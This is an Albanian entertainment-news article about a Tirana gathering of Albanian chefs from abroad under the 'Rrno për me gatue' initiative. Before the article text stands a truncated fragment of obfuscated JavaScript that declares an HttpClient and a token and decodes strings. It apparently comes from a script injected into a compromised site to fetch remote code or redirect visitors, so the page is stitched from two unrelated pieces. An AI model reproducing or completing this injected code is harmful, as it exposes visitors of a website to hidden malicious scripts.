;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Iniciativa që mblodhi shefat e famshëm shqiptarë në një vend (FOTO)

By

Me punën që bëjnë, nga një cep i botës në tjetrin, ata lënë gjurmë kudo…

E dukej se ishte vëtëm çështje kohë që të gjithë të bëhen bashkë në një vend!

Kuzhinierë shqiptarë nga mbarë bota janë mbledhur sot në Tiranë tek Pazari i Ri në kuadër të nismës “Rrno për me gatue”.

“Rrno për me gatue” është një nismë e cila përbën një lëvizje gastronomike që mëton të mbledhë kuzhinierë e shefa shqiptarë nga e gjithë bota me qëllime të qarta – ruajtja, rifreskimi, zhvillimi dhe promovimi i kuzhinës shqiptare ndërkombëtarisht.

Djemtë të cilët punojnë në restorante super-ekskluzive nëpër botë, quhen: ‘Besnik Gashi – kuzhinier në Malmo të Suedisë, Fejsal Demiraj në Danimarkë, Albert Hamza në Greqi, Rrahman Buqaj në Belgjikë dhe Bleri Dervishi në Milano.

Më të mirët i mblodhi Bledar Kola, shef i restorantit ‘Mulligjiu’ në Tiranë.

Kjo lëvizje ka derivuar nga libri i famshëm me po të njejtin emër i At Zef Pllumbit, priftit shqiptar i cili kaloi 23 vite në burgjet dhe kampet gjatë regjimit komunist shqiptar.

Më poshtë, Prive.al ju sjell disa fotografi nga eventi i cili po zhvillohet sonte. /Prive.al

Artikuj të ngjashëm